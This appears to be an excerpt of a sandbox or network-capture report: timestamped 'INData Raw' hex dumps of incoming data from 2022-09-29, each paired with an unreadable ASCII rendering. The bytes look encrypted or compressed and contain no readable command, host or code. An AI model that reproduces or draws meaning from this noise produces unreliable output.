                                                                                                                                                            2022-09-29 12:45:04 UTC11310INData Raw: 5c bd a3 ca 98 f7 ae 88 b6 70 5e 4d af 6f 30 1f 6a 0d c1 b3 da 11 ee 82 df 31 5c d4 58 45 4b 50 42 c0 27 21 54 c8 a8 81 df 0d a1 8a 22 72 15 b0 05 61 55 4d af af d9 0a c5 73 fb 63 43 ae 13 1f 86 b4 ef ab 67 a4 74 35 f6 0e dd 62 9f 76 b2 e2 9e 71 12 c8 42 d2 c9 b1 89 01 f4 d0 89 77 79 a6 fe 36 c3 b9 02 0c 2d f0 8c 53 96 f2 ef 44 23 e9 93 6d 58 d8 43 58 7b 46 02 58 e3 ce 77 00 59 6a 62 bc cf d7 9c 8a e3 9d 41 b9 6f e5 47 f0 bb 37 58 0e 76 e5 b3 b7 d2 ae 68 14 51 c5 44 ad 3d e9 7f f8 44 bc 1d 86 2d a2 bc 17 ce 4d 73 d3 af 1e 42 2c 30 bb bf 6a 37 9c 5b f4 bd 77 36 42 ea 0d 21 87 27 aa 6e d2 f4 60 52 8a 0c ae f3 c5 10 f8 81 d0 eb e6 99 36 ed 50 44 a9 38 96 2a 6f d0 1b b6 4f b9 5a 1e 62 66 61 8f d0 6f 73 28 4d 4a 3a ef 35 96 b4 20 1b ce d8 c2 10 91 bc e4 ca dc
                                                                                                                                                            Data Ascii: \p^Mo0j1\XEKPB'!T"raUMscCgt5bvqBwy6-SD#mXCX{FXwYjbAoG7XvhQD=D-MsB,0j7[w6B!'n`R6PD8*oOZbfaos(MJ:5
                                                                                                                                                            2022-09-29 12:45:04 UTC11326INData Raw: bc fd 7b 95 5a a4 0d e3 a3 21 e7 62 94 79 14 91 83 57 25 89 a4 0e f2 af 8f 46 f9 0d 63 5b 97 22 8d a7 2b b3 35 8b 95 8a e9 13 b2 b7 3c 1d db 09 8a 57 bd e5 a7 56 a3 78 74 fa 57 23 5c a6 12 64 be 60 a5 b6 3f 29 3f ba 5c 19 0b 11 db 7f 03 ad 2c 94 78 99 f1 8a 0e 61 a9 88 3a ef e8 1b 37 ea a3 e1 87 99 c5 5c df 95 89 05 b0 48 80 25 3a 46 fe 33 36 b5 3c cc f6 bb 93 f1 e2 9c 4d a9 02 01 ce d5 71 30 19 a7 57 c4 96 19 e4 82 2a 05 57 ab 37 1f af 1f d9 b8 d4 76 cf a3 90 b8 b2 11 bf 05 98 88 df 0a 4c 7f 03 6c d2 5f d3 c9 65 04 c7 8a 46 5a b3 8b 32 34 42 25 27 e3 dd 95 a9 45 95 d5 1f 4c f1 1c 0f 18 01 52 e4 a7 72 86 23 1b e0 6e d5 14 43 4c b3 53 ab c4 54 12 9f 89 09 73 df cb 4a 27 da ec 69 ec 67 33 14 b7 8a 80 cf 90 ef 0a 72 f0 30 9e 84 3c 63 41 8a bd 53 35 96 01 fc
                                                                                                                                                            Data Ascii: {Z!byW%Fc["+5<WVxtW#\d`?)?\,xa:7\H%:F36<Mq0W*W7vLl_eFZ24B%'ELRr#nCLSTsJ'ig3r0<cAS5
                                                                                                                                                            2022-09-29 12:45:04 UTC11342INData Raw: 35 a0 58 8f 2f f5 e8 30 df b3 ed 98 7f c3 2e 69 41 a6 fa 69 86 93 b3 b7 26 15 f0 6d 61 57 99 d4 02 fb 8d 84 cc 5b 0d ab 30 6d c0 04 4b 41 0c e3 91 1a 3b 03 92 a4 ad 99 d9 2e 83 d4 7a 51 18 2b 96 f9 46 37 88 63 f7 30 0b c5 a3 26 96 b1 f1 ce 52 cc 5c 5c 4c e6 62 de 9d aa 4c f7 9a 59 80 fb 44 bf 4f 8a 03 05 54 69 b4 70 96 a2 35 b9 84 21 7d 63 79 65 df ba 7a 76 4f ba 8b 04 15 bb 68 50 01 35 97 6e 8c f0 3b 2d 8e ca 8d 4f 19 dc 52 1b 64 ba 9a 58 21 10 4c a6 1f ed 6d 3d 51 68 be d4 97 60 3b 6c 29 62 32 53 d6 eb 64 1f 91 0b 18 e6 32 ff 77 ac 65 2f 6a 22 64 95 8a ee f1 05 04 04 eb f1 e1 e4 4c c2 25 cd 7c 29 90 27 52 a1 f3 d4 99 b2 2e 4e 38 d7 34 06 53 a4 23 25 48 67 25 75 d4 e5 83 72 dc fe fe 42 2a 7d 27 68 e4 26 ce 97 df 2d ea 79 3a d2 b1 35 cc 57 e3 25 a2 86 24
                                                                                                                                                            Data Ascii: 5X/0.iAi&maW[0mKA;.zQ+F7c0&R\\LbLYDOTip5!}cyezvOhP5n;-ORdX!Lm=Qh`;l)b2Sd2we/j"dL%|)'R.N84S#%Hg%urB*}'h&-y:5W%$
                                                                                                                                                            2022-09-29 12:45:04 UTC11358INData Raw: fd 36 3a 68 9e 6c 4a 58 ce 63 f5 63 54 14 52 72 2f eb a1 c5 c7 a7 0b 3c dc b0 65 e0 1f b2 f4 c0 e9 8f 71 1e 41 f7 9c 73 7f 1b 4a 06 bf 57 f4 94 5c f1 50 4e 40 65 f9 12 0e 1c 64 3f 36 50 6a 84 99 58 dd 8f 0c 31 92 1e 0e 33 d6 ac 91 8a ca dc 22 f5 38 d0 82 f0 21 09 24 da 64 03 5c a0 9b 4b 50 1e 55 af e1 6a 7f 84 4f 45 10 3b 1e fe c7 31 8a 61 70 93 e8 f5 8d ca d5 99 4e ee ce 38 0b e9 45 f4 f0 c9 39 24 f1 53 50 6d 87 41 17 90 b5 1f 22 df 6d 59 c3 47 a2 8b 22 34 33 55 af 78 43 7e c1 a6 62 23 b7 71 98 b2 a4 a8 7f 37 26 1e 55 b4 03 cd bb b0 09 6d d9 77 c6 5f 70 e5 47 60 79 22 2b 6f 74 b9 55 06 4e 53 3c 5b 95 63 0e 56 2a 00 55 9f cb 2d ef c5 ed f5 43 31 bc 71 9e f9 cb ca 5a f5 7b 10 52 f3 b5 ae ac 0f 45 34 3b 94 4c ac 7a c3 6a 3b 13 b0 93 86 61 29 32 b3 d8 c2 b2
                                                                                                                                                            Data Ascii: 6:hlJXccTRr/<eqAsJW\PN@ed?6PjX13"8!$d\KPUjOE;1apN8E9$SPmA"mYG"43UxC~b#q7&Umw_pG`y"+otUNS<[cV*U-C1qZ{RE4;Lzj;a)2
                                                                                                                                                            2022-09-29 12:45:04 UTC11374INData Raw: dc 86 37 cd 84 85 39 22 e7 78 d5 7f 48 98 98 7c 20 34 76 1b 5f 57 70 5d 9f ec d1 2a 6b 2c f2 ca f5 9b 33 32 11 01 f3 87 57 cd 78 a7 48 53 7b c2 03 e7 60 85 89 53 07 55 48 6d 23 af fc 63 36 08 af 6b 0f a3 42 5f 81 34 f3 55 5e 81 63 af d3 86 c5 da 91 c3 e9 53 68 0d 7c a9 fa 58 2d d7 ec 3e d6 50 fa 45 19 9a 88 be 9a bf cf 9b 14 5c d3 4d 98 b3 fd fe 13 ae b2 4c cb b6 ec c6 87 7c f4 0e 34 10 f8 95 1f 5a c3 42 45 94 53 41 9d 4f 8a 28 48 e6 d4 c6 27 1d 01 ea 4d 3f ce 61 8c 3a 45 5b 7e 7a eb 04 50 da 4f 31 3a 20 62 fa 1e 9b 77 ca a3 76 6c fb 1d cc 1b 9d 79 4d 1d 3e 32 e6 ce f6 e4 59 7b 29 88 16 5a 86 dd 10 fe 2f 1e 55 1d 06 ba 86 45 3f 25 8f 04 29 69 2c 45 2b 1d 6a 6c 06 fb e4 42 c7 46 af 00 3c f8 dc b0 92 e3 22 df 67 a3 45 58 38 f8 54 26 11 a7 e8 be f8 56 65 1c
                                                                                                                                                            Data Ascii: 79"xH| 4v_Wp]*k,32WxHS{`SUHm#c6kB_4U^cSh|X->PE\ML|4ZBESAO(H'M?a:E[~zPO1: bwvlyM>2Y{)Z/UE?%)i,E+jlBF<"gEX8T&Ve
                                                                                                                                                            2022-09-29 12:45:04 UTC11390INData Raw: 70 3c 08 80 eb b6 ca a2 0c df 9c 88 0b 0e 31 97 be 88 a1 70 da 56 6e 84 c8 59 b4 7b e8 1a 30 c6 90 b3 5f 90 e2 0f 24 67 5a fa 17 61 2c c4 b0 51 23 f1 71 6d fe 87 e7 b0 e4 1b 9d 20 ab e6 d2 3d 49 e4 53 c8 84 98 11 5a 6d bb 94 25 6f fb 20 32 57 d4 ce 53 97 dd 3f 07 b4 e7 0c ac b2 18 4d 80 f0 69 1f 91 4c f3 89 bb 55 87 72 9a 89 70 ab 17 26 3a 18 5e f7 ab f9 94 05 04 d6 1b d9 c8 1e 0f e1 7c 29 1c 72 5c fc 9d b3 9e f8 af 46 ae 02 12 a0 a9 51 3b b0 0f 30 39 c6 c9 6c c5 f3 0b fc 0d d6 bf 3a 0f fd 25 2e b5 a5 f2 a7 4c 22 23 0f bc 68 dc f9 08 40 77 9f 5e 42 4c 77 64 0d 87 ef b2 28 71 40 6d a9 fa 27 49 3b 0b d6 7f fc 81 57 9c 7c 1b 74 8b 9a 24 8c e2 d2 9d 4a fc 30 28 6c dc 37 65 2f 9c 56 52 ff 0d 41 a3 e1 f1 c0 7a 22 52 4b 54 c4 28 59 4b 94 1f 7b 58 e2 02 09 76 66
                                                                                                                                                            Data Ascii: p<1pVnY{0_$gZa,Q#qm =ISZm%o 2WS?MiLUrp&:^|)r\FQ;09l:%.L"#h@w^BLwd(q@m'I;W|t$J0(l7e/VRAz"RKT(YK{Xvf
                                                                                                                                                            2022-09-29 12:45:04 UTC11406INData Raw: fb 52 37 61 a3 24 2c de 7d a0 04 97 ca 56 e3 a9 3c a8 57 88 01 22 c1 e7 7c 53 c2 54 03 86 d3 c2 6d ae 12 8a a8 b5 e2 81 c1 42 bf 0e f5 70 15 88 a4 78 39 e0 e4 77 58 06 74 6d 61 e6 b0 59 99 c9 db e5 14 51 69 86 0e c6 35 09 d5 83 54 0c 7a 8d b1 a0 87 96 28 2b 0a 2a 5d 0e f3 7d ee ae 9b 86 f7 de e0 d7 1c 30 89 e9 2a 33 e0 7f 3a 99 5b 06 f3 b9 c3 ca 1b 12 d2 b6 49 f2 bc e6 81 d8 58 ff 47 d8 00 53 00 de 95 fe e0 cc a5 fb 98 ea ac ad 34 88 1a c1 3e c4 6c bd ce e6 96 e6 35 26 04 5f ce 1d f9 b6 8d c6 d4 d7 85 c1 8e d3 94 83 33 2b 52 ac 17 f3 55 f8 54 84 1f 3e 19 f8 5c ef c3 1e 8b 0b a7 14 a3 50 db 94 64 62 53 08 82 dd 08 e0 92 1f 88 57 03 65 39 3f a7 37 5c fb 58 8a 8d 87 ed 87 d8 77 9a 49 e3 f2 ee 53 db 5c 50 c3 a9 19 df 7b ca 73 46 73 d9 8e 7e dd 07 df b3 5b be
                                                                                                                                                            Data Ascii: R7a$,}V<W"|STmBpx9wXtmaYQi5Tz(+*]}0*3:[IXGS4>l5&_3+RUT>\PdbSWe9?7\XwIS\P{sFs~[
                                                                                                                                                            2022-09-29 12:45:04 UTC11422INData Raw: 09 55 14 7e b8 6e 72 d2 1b a9 1b 6f 51 2b f4 3c 0d 1f 2c 88 14 80 ed e4 5b 3e 09 8f 92 a0 3b 9b 1c dd 09 f1 6e ca c5 fc 8c cd 95 01 87 df de 27 4e db 01 d2 5a ac 7f 8a ce 8b 24 c0 09 94 30 b6 fc bc 78 25 34 b2 41 b6 a3 bc 75 cd 87 b7 3d c3 b3 10 cd d2 dd a4 a3 16 92 ff cc 9c 61 ca 7a 7d 5a 80 cb 4a 20 5f bb be 1a 8d 8c f2 45 27 84 9c c2 a8 b6 14 00 e0 d3 c5 d0 95 c8 e0 7e d1 5c 19 c2 bd ee 7c 6c 98 18 9c b8 dd 68 68 ee 34 fb 3c 89 ae 42 0d 88 fd 70 2c 42 81 f3 08 5b a8 46 4b 34 15 05 03 22 17 b6 d7 18 f7 b9 5c 26 75 7c 32 b5 c4 ca 14 09 7b eb 74 19 90 51 9a 8a ad a3 8a e6 7e bc 47 44 10 df bd ef ec 89 d0 05 f5 69 dd fc 4d f2 11 d3 89 8e 7b 95 02 d1 2b e5 6d a7 46 e2 25 ee b9 e4 a0 2e e6 c6 41 9d 5c 94 4f 2c 06 9f 85 4c 23 19 d2 15 c2 99 03 33 a7 1c 02 55
                                                                                                                                                            Data Ascii: U~nroQ+<,[>;n'NZ$0x%4Au=az}ZJ _E'~\|lhh4<Bp,B[FK4"\&u|2{tQ~GDiM{+mF%.A\O,L#3U
                                                                                                                                                            2022-09-29 12:45:04 UTC11438INData Raw: 4b ce 72 69 52 67 85 bf 1d 97 6b 23 bd 57 ea 5f 9e 43 74 e9 f6 1d 3e 5c 03 cc ee c8 02 53 b1 9d a3 2c 33 94 22 93 c4 80 51 f3 67 fb 85 d1 44 5f 85 7a 80 be 60 71 d5 e9 33 66 c6 fe c9 86 ea 09 0e ef 82 1b aa a9 5b 0e 33 29 77 4c 31 b1 73 52 ed 57 c7 bc 59 12 77 ee 25 ee 07 08 44 79 95 8a 9f e7 85 9b 99 ed b2 91 2d 25 93 a5 1d 79 f0 84 47 3c f1 15 cf 86 fe 67 30 2a 03 13 6d 02 86 61 03 38 68 5a 44 c8 58 a7 9e 59 09 b4 66 18 24 47 f7 2f 1c 01 9c 86 9b 63 e6 8d 9e c7 9b f6 38 58 a3 95 b5 84 65 43 b4 77 b4 34 31 b4 b7 fd 4c 95 f4 be fd d3 34 30 4b 0b ad 2d b6 ce 08 59 b6 c3 2f 8f d1 cc 01 03 08 d1 16 9c 03 97 ee b7 51 bc cd 8b 8e 55 fd 0b 01 aa eb 6e fa f8 26 0f 68 1e c8 ab 79 85 8d c1 b7 64 d4 07 82 5e e4 de e2 c0 fc fb 2c 97 cc f2 e0 f9 e1 26 c8 1d c2 55 67
                                                                                                                                                            Data Ascii: KriRgk#W_Ct>\S,3"QgD_z`q3f[3)wL1sRWYw%Dy-%yG<g0*ma8hZDXYf$G/c8XeCw41L40K-Y/QUn&hyd^,&Ug
                                                                                                                                                            2022-09-29 12:45:04 UTC11454INData Raw: 52 3f 33 ac cd ac e3 13 a2 1d c7 b1 8f d0 da 7d 42 5a bf a4 c1 bc 48 16 ad 0c 20 92 34 a2 8b cc c4 82 85 46 bf e5 bc 5f a9 13 90 5d a3 a7 3c 03 87 45 01 cf 84 78 b2 a8 08 ab c9 f5 a1 bb eb 95 79 6a 3c bc 04 0f eb e5 2e 0f e3 54 96 6f 5e 6c 59 48 1b 28 aa ed e8 8a 62 45 b1 be 33 0a 53 f7 0a 71 0d 38 ae c6 c1 22 b6 48 be 1f 51 0d a5 fc e1 0d 8f 38 e3 f8 28 1e 0f 02 eb da f5 05 57 c5 64 41 c7 20 6d a8 e1 1b 4c 1d b1 ba 84 18 37 fb d9 21 48 1a 49 20 2d 36 4d f1 31 da 7e b8 d5 f9 49 a3 ac b0 05 6b fc 17 ba 89 ff d1 66 d7 ce 07 02 a6 ee 6e 03 41 97 a6 bd 45 84 10 9c c5 80 de 75 77 1c 36 e0 62 37 1a f3 45 cf 24 c5 3d 51 bb 0c 33 3e ee 46 cf c4 39 c9 f3 22 95 1a 26 8b e3 75 77 45 bc a8 bd 0e 80 e8 fd 38 00 5d 4c 2f 14 e3 09 26 3f 1c a6 ec b4 dc 39 c2 c1 25 bb fb
                                                                                                                                                            Data Ascii: R?3}BZH 4F_]<Exyj<.To^lYH(bE3Sq8"HQ8(WdA mL7!HI -6M1~IkfnAEuw6b7E$=Q3>F9"&uwE8]L/&?9%
                                                                                                                                                            2022-09-29 12:45:04 UTC11470INData Raw: a9 dc 29 52 1d d8 26 0c 74 40 91 9a ae 29 cb 1f f0 4b 0b 11 bd 97 20 13 53 1f 0f 5d 60 b7 5a 33 ee b1 ef 0f a6 3c 83 31 17 fa d0 cd 05 93 80 60 30 65 fa 5a 80 71 4b bb fb fa cb 6f ef ea 3a a8 e3 d8 44 a2 6e 6c af 2f 98 24 eb 12 07 14 c8 ae 72 25 0c bd 25 2f e7 f6 55 13 0b 3a 11 a4 76 45 29 8f e0 1a 6a f1 15 ac 0a 27 e8 43 7d 84 bd 3a fa 36 84 dd 4f 21 84 48 5e 93 8e 33 b9 dd f0 4a 08 19 72 2e 67 db a0 a3 ec 55 92 c8 51 12 a5 4c f7 d7 78 e6 08 38 40 d8 68 28 04 7e a1 18 a8 44 3a f0 10 6c 3c 36 af b8 d8 d2 76 a2 07 b4 ad 5f 7d e1 df 0f 90 b4 65 7f 12 37 3a 6e 18 0a d0 76 1b 74 61 c1 ad 76 36 ae 20 43 ed 16 c9 45 7a f1 35 ed 46 d8 6f f5 64 b2 18 bf 8f 6a ad cb aa 27 7d 25 59 f1 0c 66 18 f8 66 9b 4e 87 7e c6 51 41 36 b8 b6 ab 3e a9 3a d2 5c 0f fd e2 34 51 3c
                                                                                                                                                            Data Ascii: )R&t@)K S]`Z3<1`0eZqKo:Dnl/$r%%/U:vE)j'C}:6O!H^3Jr.gUQLx8@h(~D:l<6v_}e7:nvtav6 CEz5Fodj'}%YffN~QA6>:\4Q<
                                                                                                                                                            2022-09-29 12:45:04 UTC11486INData Raw: fb 94 9b 9e 41 f5 f3 b1 08 bf 17 23 e0 f8 1f 60 03 39 0b 7f 37 e1 45 cf 62 1d 2f fa 18 d1 b0 1d ef bd d9 56 51 4a a0 cf 08 87 0f 28 71 5b 0a 90 40 65 4a b9 80 83 56 7d 37 6f 64 f4 4a f7 d1 d6 3c 66 84 c3 01 87 da 1c e5 33 ed 15 70 19 db 94 b5 3b 22 bd 37 74 90 15 06 5d 51 c0 36 67 63 ab 1f f6 6c 2d 56 db 73 0d 21 3e d8 1c a5 43 ba 8f 03 1d bf 7d 84 08 4c 39 65 16 65 33 7e d9 a9 ec ee 40 e1 e4 b0 16 35 4c e6 46 18 7f ef 9e 95 13 5f 43 62 68 bd 05 a5 2a ee 1b 5b 3c b5 08 a6 44 04 3b b9 fd 50 d8 62 e2 04 d4 00 09 0d df 5a ac ff 4a 49 0f f9 e5 60 8e 38 a7 e6 b6 0a 76 ad c5 9f 6d 88 80 6f 80 bf 41 3e b5 9e 27 e5 6d 04 5b a8 5c ce 84 df 17 b1 82 d8 7f ef 1d dc e5 9f fa c1 62 71 0e c6 af 9f 99 10 89 72 66 55 9f 72 b0 0a cc 51 34 a2 c3 41 a0 6c d1 a4 34 11 cf 05
                                                                                                                                                            Data Ascii: A#`97Eb/VQJ(q[@eJV}7odJ<f3p;"7t]Q6gcl-Vs!>C}L9ee3~@5LF_Cbh*[<D;PbZJI`8vmoA>'m[\bqrfUrQ4Al4
                                                                                                                                                            2022-09-29 12:45:04 UTC11502INData Raw: 2e ac 64 02 28 0d af 04 74 6a 71 ec 43 bf 96 a5 e0 27 c9 f8 18 20 91 52 5e b7 b7 b4 0c b1 fd 31 8d 09 1d 32 00 b5 29 88 6b 0b a7 98 e1 1e 82 7b f8 87 73 e2 a6 5a 52 68 fa a8 a5 ca 67 bf 70 f9 76 e6 16 51 0d 9a 13 2d b5 d5 21 94 d1 68 3b f5 59 5a 49 2d 6b d6 18 df 47 07 d3 d6 5a 4f b7 be 21 c0 fe ad 46 6d e0 19 49 49 ac 99 b6 a8 c6 73 ca df 39 ae f6 41 79 36 74 e6 43 0e 44 92 04 33 56 4b f3 b1 08 b2 bb 62 a6 26 19 0d 4b 74 29 98 75 88 40 6e 1a 6c f7 08 5e f2 4a a9 33 e9 bf d9 ea 77 d1 73 36 ed c0 fb 35 05 54 c6 3b b0 57 9d 9f 59 f0 6d be ee 60 84 bb 6f 72 d5 64 43 11 16 02 d2 34 ae ac 61 55 e3 54 f2 37 83 18 c8 40 b1 76 74 eb 13 6a 36 55 ff b1 40 9f 6b 97 30 df b8 7b a0 4b 18 4d 73 b4 e9 56 63 de fc 7f 1f df 75 ec 08 e8 b8 b3 fa 06 a7 4a bf b9 37 0c b1 8f
                                                                                                                                                            Data Ascii: .d(tjqC' R^12)k{sZRhgpvQ-!h;YZI-kGZO!FmIIs9Ay6tCD3VKb&Kt)u@nl^J3ws65T;WYm`ordC4aUT7@vtj6U@k0{KMsVcuJ7
                                                                                                                                                            2022-09-29 12:45:04 UTC11518INData Raw: bb 33 ad e6 29 54 b1 3d 2f e7 02 db ae da e5 65 4f 91 4c ee 0d a1 6a 84 30 51 92 0b 5d 09 ab d2 1f 87 5f 72 d8 d1 53 0a 61 cb 42 19 20 6d 42 91 48 16 3e de 7f 84 af c1 e8 83 89 d4 d7 a9 53 27 90 7e 46 3e 93 be 00 98 7b 1b 57 13 e3 16 2c 0b 8a 8d 00 02 67 90 66 66 28 da 57 dd 57 b9 2e e1 4f a9 2b 94 89 3a 32 cc f8 0c 36 62 1c 7c c8 c2 97 33 cf c1 89 41 ff aa 9a ee 66 0c 72 32 83 9f 67 ec 4e f2 47 74 35 6e cb d1 70 a1 f5 c0 a9 d8 d4 11 46 56 a4 c6 3b 9f 56 72 73 dc 0d da 9e ff 8a bf 31 bf df eb 6b 82 3e 0b 3b cc ea a5 d1 0d 13 77 7d 7d f0 ef 94 5f d1 da d1 7a 95 94 ce 26 f7 f8 c8 26 48 b4 3d 87 e5 e9 a6 d2 6f 9b 33 af 57 df 84 e0 78 2e c7 27 30 b3 ab 76 76 69 8b 71 23 46 f8 80 2e 7c 44 93 15 e9 41 98 8b a4 17 e7 e8 6e 76 f1 c6 26 b6 28 d2 8e 91 2f 56 a5 e3
                                                                                                                                                            Data Ascii: 3)T=/eOLj0Q]_rSaB mBH>S'~F>{W,gff(WW.O+:26b|3Afr2gNGt5npFV;Vrs1k>;w}}_z&&H=o3Wx.'0vviq#F.|DAnv&(/V
                                                                                                                                                            2022-09-29 12:45:04 UTC11534INData Raw: 62 81 ae 94 9d 79 2b 47 72 85 a9 cd 35 fb 74 07 fe aa 21 17 c5 39 cc a1 fe de db 93 d1 14 da 48 b8 8c 9c 0b f1 d2 d3 59 91 c4 3c e8 9f 98 28 0a 9f 0f 04 28 68 f7 fd 10 d0 4a c4 eb d3 83 48 cc 38 f1 26 b3 5d 67 70 ea 84 08 89 76 7d f6 3e d8 44 41 bd b3 e9 8b 0b e4 fb 3a 1b 35 ad c3 a1 86 08 a1 77 28 a9 4a b1 a4 f2 a1 f1 b1 8b 0b ab 26 55 9f 7b 1a 5c 96 79 61 53 a7 b8 2b 1d de 34 9b 04 36 aa db 57 b1 e6 f0 b3 ef f6 1d f4 a5 8a 2d 72 7e 88 5a 74 17 92 5a fc f1 5e c1 ef 71 b1 09 71 e9 bd 22 71 f0 72 ef 77 8d e0 a2 08 27 3f c5 e5 0e 2f 74 be bf 45 89 c1 b5 8c f8 82 5a 39 6b a5 be bf bc 43 30 8f 1f 20 48 a0 f9 2b a6 76 7d 02 29 64 b3 eb 1c 05 4e 83 d0 ba 8c e6 fa 98 06 f4 86 cf e0 c4 66 9a b0 71 ed 68 3e 42 19 a1 64 f6 2f 19 44 7e f6 4c 35 5f 45 c2 da c4 b4 54
                                                                                                                                                            Data Ascii: by+Gr5t!9HY<((hJH8&]gpv}>DA:5w(J&U{\yaS+46W-r~ZtZ^qq"qrw'?/tEZ9kC0 H+v})dNfqh>Bd/D~L5_ET
                                                                                                                                                            2022-09-29 12:45:04 UTC11550INData Raw: 95 4e eb 4f 8d 90 d0 bf a5 64 ab 71 48 02 03 86 99 b0 41 12 fb 89 36 a1 9f db ee a6 9d 78 39 67 61 8a 0a c5 30 61 56 bd 56 7d 41 ca e2 ff ac 0a 44 96 de 14 c5 2d 1d de 47 73 25 13 2a 3d b2 3a 96 34 61 6e 41 38 6b 10 f8 7c 5a 8f a4 88 27 91 b7 84 25 c8 f6 91 41 02 a6 1d 32 15 aa c7 34 58 55 f2 19 de d8 6a ee e9 61 57 ef 0a 12 64 2d 4c 7c 27 09 4c 04 68 2e 4a 8b 0f 6b e3 71 2a e1 27 a8 0f a8 e6 fa c5 8a 34 cd 2a f9 64 7f 9e 61 e4 60 41 9e 1f aa 38 16 14 d8 bc e7 a1 81 a3 ef 5d f6 ae db 5d 8d 2f 72 dd b5 fd ef 9b 1e c6 2f 32 ad 36 8f 45 c8 94 88 ac 8c 2d 37 9f 10 45 48 f0 bd 1b 21 e7 89 d7 96 4a 72 2a 7b bb 97 a6 c8 7d 2d d9 a5 a7 c6 fc 3d 27 40 85 46 e7 fb 88 ed 1f 15 a7 d7 38 ed 1e 67 70 73 8a 98 6e f7 fe 00 35 ac fd d4 10 c7 b2 6b c4 54 37 34 ae a3 eb 99
                                                                                                                                                            Data Ascii: NOdqHA6x9ga0aVV}AD-Gs%*=:4anA8k|Z'%A24XUjaWd-L|'Lh.Jkq*'4*da`A8]]/r/26E-7EH!Jr*{}-='@F8gpsn5kT74
                                                                                                                                                            2022-09-29 12:45:04 UTC11566INData Raw: 68 7f 1f 7f b9 f1 b3 d5 67 cd 1d 5d b8 54 24 b9 8b 27 5e 32 0c 4c 9b 08 7a 4a 81 a2 76 82 8e b3 64 85 ca 23 b4 56 cc ab f2 b2 1a 18 f5 96 b1 2f 9f fa ea 81 b6 5a d0 96 93 5f b7 88 a9 d6 fe d2 8c 24 b9 e6 e5 c0 ec b9 2d cd 95 47 fe 7f f1 db 2c 24 02 4b af c9 3c ad f5 cf fd 40 5a d6 80 ce 57 1e 84 c8 d7 e7 dd df b4 73 7a fb 06 8e ed ce bf a9 5a 9e 51 80 1f b7 8c b4 8b ca 14 fe d3 00 19 2d a8 9c 1a 9d e1 bf 0a f6 5f dc 8a 3e ab 6f 4d 47 98 44 eb 3f 73 7e b0 9c 95 12 56 a5 cc f8 f3 a3 ec 5d 2e 48 4b 5d ab da 5f 6e a4 31 9e 40 0d 15 b5 ba 7a 10 b1 df 61 c2 34 b4 c1 4d 8e a5 53 dc 9a 1f 72 13 4a 3a 93 21 99 28 55 56 77 c9 a5 58 b5 13 f8 0b 8b a5 0f 34 e3 c2 84 9e 0f 2b 52 a7 31 8a 02 d1 85 66 4f b0 43 61 33 2f 84 cd 21 41 0e 55 9d 8a 17 f4 b8 bc b5 4b c2 e4 9d
                                                                                                                                                            Data Ascii: hg]T$'^2LzJvd#V/Z_$-G,$K<@ZWszZQ-_>oMGD?s~V].HK]_n1@za4MSrJ:!(UVwX4+R1fOCa3/!AUK
                                                                                                                                                            2022-09-29 12:45:04 UTC11582INData Raw: 2c f6 00 60 99 2b 12 7e b1 56 af 1d 18 2a e3 a6 cd 9d b5 f8 1a 03 2e 1a c3 35 ac 87 a6 c0 aa f1 96 86 f9 6b 6f 8e 6f fa 2d a6 6e 66 75 e3 6b b1 d3 b1 0b 05 52 ea 73 d9 47 a7 ca fa 0f 04 6e 94 e7 ab 54 32 55 e1 82 91 16 f6 a5 33 e5 d0 a4 59 37 8a 1a 50 bb 98 d5 6d 6b aa 42 7b aa f1 33 22 5e d5 49 01 c5 66 b0 72 d9 37 68 d3 92 a6 e2 a8 17 7d 79 7b 3b 29 e1 bc b6 c6 2c 4c 22 f8 ea 80 61 72 07 58 97 e3 4f d8 3d 25 3e 60 1e 9e da 66 2f ee 6e 6c 7c ca e6 4a da e1 4e cc 36 22 f6 ef d1 87 04 5c 36 b6 09 54 c0 f9 a5 a5 9a 56 0c b5 6f 77 68 74 31 96 ae ab 40 6e 61 38 1f c3 1e 37 31 08 cf 52 64 e4 8f dc 26 9d af 71 9d f0 c0 dc 3e ae 1a 7f b1 ad 71 f1 8a 34 16 dc 81 77 1f 16 6c 0c 69 39 42 cf 4a 17 6d a8 c8 9c 78 c9 91 33 9e b4 32 e6 3d 40 f5 20 de 38 2e 1a 1a 93 ca
                                                                                                                                                            Data Ascii: ,`+~V*.5koo-nfukRsGnT2U3Y7PmkB{3"^Ifr7h}y{;),L"arXO=%>`f/nl|JN6"\6TVowht1@na871Rd&q>q4wli9BJmx32=@ 8.
                                                                                                                                                            2022-09-29 12:45:04 UTC11598INData Raw: b9 51 18 a1 86 d2 cb 0b 4a 2c a4 7b 1a fc 92 f4 6f 17 f2 d2 d9 1f dd e3 18 86 58 1f 04 9b d9 d6 6e 80 e4 fd a7 7b 2b 80 df b5 01 75 73 f7 93 62 67 4c b1 f3 42 fd bb 81 57 21 c2 70 76 c2 bb 7b 6f c6 2d da 73 e7 36 78 e2 0c 46 fe 54 bc 66 db 12 34 f2 52 5c f0 aa d8 70 9a cf ae 90 6b 49 a6 e4 4c 99 37 35 07 cd 9e 1f 92 8d c7 c4 f2 27 1b f5 36 a4 43 b8 bb 5f 13 85 8b bd 09 47 ad 38 e7 98 a7 0d aa c2 01 2c 5a 2d a3 9f 3c 0d cf 77 02 cb 62 d7 4c 22 a8 de b4 cc 92 4c 26 64 26 aa a2 4e 9e 7b b6 70 76 42 cb eb 17 bc bc c8 97 d1 00 0d a4 eb 68 d6 e4 41 21 25 71 9f 78 ee 62 74 55 13 13 99 54 b5 27 36 33 a6 0b 2b dc 3a d5 82 99 17 3c de 38 1f 44 bf 28 84 f8 da b6 2d 26 f3 09 5b 46 2a 66 08 94 64 71 f2 f6 0c 15 0e a7 07 a4 68 e0 99 a2 37 fd 56 12 f4 01 96 0b 04 dd e7
                                                                                                                                                            Data Ascii: QJ,{oXn{+usbgLBW!pv{o-s6xFTf4R\pkIL75'6C_G8,Z-<wbL"L&d&N{pvBhA!%qxbtUT'63+:<8D(-&[F*fdqh7V
